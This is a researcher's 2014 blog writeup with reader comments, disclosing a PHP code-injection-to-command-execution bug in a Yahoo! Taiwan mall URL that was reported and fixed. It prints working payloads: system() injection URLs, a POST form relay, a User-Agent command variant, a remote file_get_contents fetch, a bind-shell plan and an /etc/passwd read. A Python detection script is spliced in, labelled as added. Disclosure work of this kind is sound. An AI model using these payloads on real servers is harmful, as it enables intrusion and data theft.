Yahoo! Remote Command Execution Vulnerability.

Hello Everyone,

This is my first writeup for the blog, which I chose to be about the “Yahoo Remote Code Execution” vulnerability.

The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.

Vulnerability Link:

http://tw.user.mall.yahoo.com/rating/list?sid=$Vulnerability

Payload:

${@print(system("whoami"))}

Note:

The same server hosted many other Yahoo! sub-domains!

What is “Remote PHP Code Injection”?

Simply put, PHP code injection occurs when user-supplied (GET/POST) parameter values are reflected inside an eval() call. That vulnerability allows an attacker to execute arbitrary PHP code, such as system("id") or any other PHP function.

That said, I was able to inject PHP code by manipulating the value of the “sid” parameter.

In the beginning I tried to list the directories and files with “dir” via the system function:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("dir"))}

Indeed, I needed a better view, so I tried system("ls -la"). But it didn’t work: the URL does not accept any spaces!

What I actually needed was a good proof of concept to show the Yahoo! Security Team how dangerous this vulnerability was, given the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue with some tricks, including URL-encoding the space as %20, but it didn’t work. Same result with double URL encoding!

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("ls%20-la"))}

I also tried to work around it with file_get_contents("http://sec-down.com/poc.txt"), but that didn’t work because of the folder permissions. Did you say do it in /tmp?!

I thought of:

1- Uploading “bind.sh”, a bind-shell script, into the /tmp directory

2- Executing it to open a bind connection on the server

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("./tmp/bind.sh"))}

3- Receiving the connection with Netcat, after which I would be free to run whatever commands I wanted :D

But Netcat is a hacking tool! It could be detected by any simple AV/IDS on the system, and that could ruin the whole thing!
I had to go for another solution.

Thanks to Ahmed Abul-Ela and Ibrahim Mosaad I was able to execute commands using system($_POST['x2'])

POC:

<form method="POST" action="http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST['x2']))}">
<input type="text" name="x2">
<input type="submit"></form>

Also, by using system($_SERVER['HTTP_USER_AGENT']) I could inject my commands into the User-Agent header.
e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_SERVER['HTTP_USER_AGENT']))}
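The injection described above (a ${...} block reaching eval(), plus the $_POST and User-Agent variants used to get around the no-spaces restriction) leaves a recognisable trace in web server logs. The following is an added detection example, not code from the original post: it URL-decodes a request's query parameters (several rounds, since the post tried double encoding) and flags the PHP complex-syntax markers and dangerous sinks seen here. The hostname and sample requests are constructed.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Markers of the PHP "complex syntax" injection from this writeup:
# a ${...} block wrapping a function call, the sinks it reached,
# and the request superglobals used to smuggle the real command.
COMPLEX_SYNTAX = re.compile(r"\$\{\s*@?\s*[a-zA-Z_]\w*\s*\(")
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|"
    r"file_get_contents|readfile)\s*\(", re.I)
TAINTED_SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\s*\[", re.I)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL encoding, stopping early
    once another decode changes nothing (catches %2520-style tricks)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(url: str, user_agent: str = "") -> list[str]:
    """Return a list of findings for one request; empty means clean."""
    findings = []
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    for name, raw in params:
        val = fully_decode(raw)
        if COMPLEX_SYNTAX.search(val):
            findings.append(f"{name}: PHP ${{...}} complex-syntax injection")
        if DANGEROUS_CALLS.search(val):
            findings.append(f"{name}: call to a dangerous PHP function")
        if TAINTED_SOURCES.search(val):
            findings.append(f"{name}: references a request superglobal")
            # The User-Agent trick: the command travels in the header,
            # so record it alongside the injection for the analyst.
            if "HTTP_USER_AGENT" in val and user_agent:
                findings.append(f"User-Agent carries payload: {user_agent!r}")
    return findings


if __name__ == "__main__":
    # Constructed sample requests (hostname is a placeholder).
    samples = [
        ("http://shop.example.invalid/rating/list?sid=123", "Mozilla/5.0"),
        ('http://shop.example.invalid/rating/list?sid=${@print(system("whoami"))}', "Mozilla/5.0"),
        ("http://shop.example.invalid/rating/list?sid=${@print(system($_SERVER['HTTP_USER_AGENT']))}", "id"),
    ]
    for url, ua in samples:
        print(url, "->", scan_request(url, ua) or "clean")
```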

Yes, I know there are other good tricks, such as readfile("/etc/passwd") and many more, but with all the adrenaline, those ideas never come to mind when you need them :D

Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:

TIMELINE:

Jan 20, 2014 at 6:39 PM – Initial report to Yahoo! Security Team.

Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo!: the server kernel was an old one with a well-known “Local Privilege Escalation” vulnerability, which means an attacker with such a vulnerability can gain ROOT ACCESS to the server!!!!

Jan 21, 2014 at 6:44 PM – Yahoo! acknowledged the vulnerability and pushed a fix for it.

Thanks to Yahoo! Security team for the fast fix release.

BTW No news about the bounty yet!

Follow me: twitter.com/zigoo0


28 Comments

  1. Ahmed Sherif - January 26, 2014

    Thanks Ebrahem for the perfect article, and congratulations on hunting such a bug ;)

  2. Salah - January 26, 2014

    Thanks for the writeup, nice catch by the way :)

  3. Ibrahim Raafat - January 26, 2014

    Congratulations on the website, and on this vulnerability discovery.
    Quick response from Yahoo, and quick write-up from you too :)
    Wish to see a new write-up from you about RCE in Google

  4. Faris - January 26, 2014

    As usual, man,
    you keep the world busy with
    XSS and SQL
    and go off playing with
    RCE
    hahaha
    Strong one, Hima, really.
    Let's see if they can manage like the Facebook guys, or whether they'll send you an expensive T-shirt this time
    worth $50.

  5. iD4rk - January 26, 2014

    Nice Hunt my friend (Y)
    And amazing write up

    keep up

  6. Abhi - January 26, 2014

    It's people like you who share their findings and continuously help the community shine. Thanks! :D Nice catch btw

  7. BugsCollector.com - January 26, 2014

    Thanks! We added your bug to our world database of security holes: http://bugscollector.com/db/tw.user.mall.yahoo.com/95/
    You are welcome to add your different bugs to our db: http://bugscollector.com/add/

  8. Yahoo! Remote Command Execution Vulnerability |... - January 26, 2014

    […] This is my first writeup for the blog, which I choose to be about “Yahoo Remote Code Execution” Vulnerability. The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.  […]

  9. Mohamed Maati - January 26, 2014

    Nice Article Hima ….
    Congrats y s7bee

  10. Ebrahim Hegazy discovered a PHP code embedding vulnerability in Yahoo - | Information security news, what is information security? - January 26, 2014

    […] his blog post, the sid parameter could have been passed directly to an eval() function, resulting in […]

  11. Mennouchi Islam Azeddine - January 26, 2014

    Nice Job Bro.
    Nice Trick in the end =D

  12. Frank - January 26, 2014

    Great writeup!

    I’m curious, as someone interested in pen testing, your process for discovering the initial vulnerability. How did it occur for you to test the sid URL parameter w/ php code? Were you specifically testing Yahoo and tried all the parameters? Or were you using Yahoo and noticed something that hinted to this?

    Thanks!

  13. Remote code execution on a Yahoo server | Zaufana Trzecia Strona - January 26, 2014

    […] days ago we described the Facebook example, and today an Egyptian researcher announced that he had discovered a way to execute arbitrary commands on one of Yahoo's servers. The bug […]

  14. mst - January 27, 2014

    Good find Ebrahim ! Yahoo owes you a big bounty for this !

  15. mohamed wasel - January 28, 2014

    Congratulations for opening your website
    I wish you the best of luck
    keep going ya 7oby

  16. Ahmed Aboul-Ela - January 28, 2014

    awesome as usual my friend , keep it up :)

    • zigoo - January 29, 2014

      What's it to you, kid? Don't come into this blog again, or I'll send Ahmed Sheba's guy to sort you out :P

  17. zigoo - January 29, 2014

    @stefano
    @frank
    I will have my next post on Avira, the second post will be a step by step post on how I managed to find such vulnerability and some other types of vulnerabilities as well, please stay tuned :)

  18. Musab Mohamed @th3_pirate - January 30, 2014

    you are the best my friend .. keep going ^_^

  19. DayZ Hacks - January 30, 2014

    What’s up, just wanted to say, I loved this article.
    It was helpful. Keep on posting!

  20. William - February 2, 2014

    I’m often running a blog and I really appreciate your content. The article has actually piqued my interest. I am going to bookmark your site and keep checking for new information.
